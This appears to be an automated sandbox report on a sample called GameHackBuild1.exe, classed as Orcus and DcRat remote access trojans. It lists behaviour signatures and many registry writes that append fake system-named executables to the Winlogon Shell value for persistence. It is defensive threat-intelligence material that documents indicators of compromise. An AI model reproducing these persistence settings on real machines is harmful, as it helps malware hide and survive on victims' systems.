Analysis Overview
SHA256
221ec8caee4804b4c9e4ced2e1f03be897bc1993d7898b2bdc00f90a093eb87d
Threat Level: Known bad
The file GameHackBuild1.exe.bin.exe was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
Process spawned unexpected child process
Orcus
Orcus main payload
Orcus family
DcRat
Dcrat family
Orcurs Rat Executable
DCRat payload
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-13 12:34
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-13 12:34
Reported
2025-01-13 12:36
Platform
win7-20240903-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
DcRat
Dcrat family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\taskhost.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\csrss.exe\", \"C:\\Windows\\de-DE\\conhost.exe.exe\", \"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\lsass.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Photo Viewer\\en-US\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\System.exe\", \"C:\\Users\\Public\\Documents\\containerRuntime.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\explorer.exe\", \"C:\\Windows\\Offline Web Pages\\conhost.exe\", \"C:\\Users\\Default\\audiodg.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\", \"C:\\Users\\Default User\\conhost.exe.exe\", \"C:\\Program Files\\Uninstall Information\\MSBuild.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\dllhost.exe\", \"C:\\Program Files\\Windows Photo Viewer\\audiodg.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\sppsvc.exe\", \"C:\\Users\\Public\\Favorites\\lsass.exe\", \"C:\\Recovery\\1a287102-69f6-11ef-b2ff-62cb582c238c\\winlogon.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
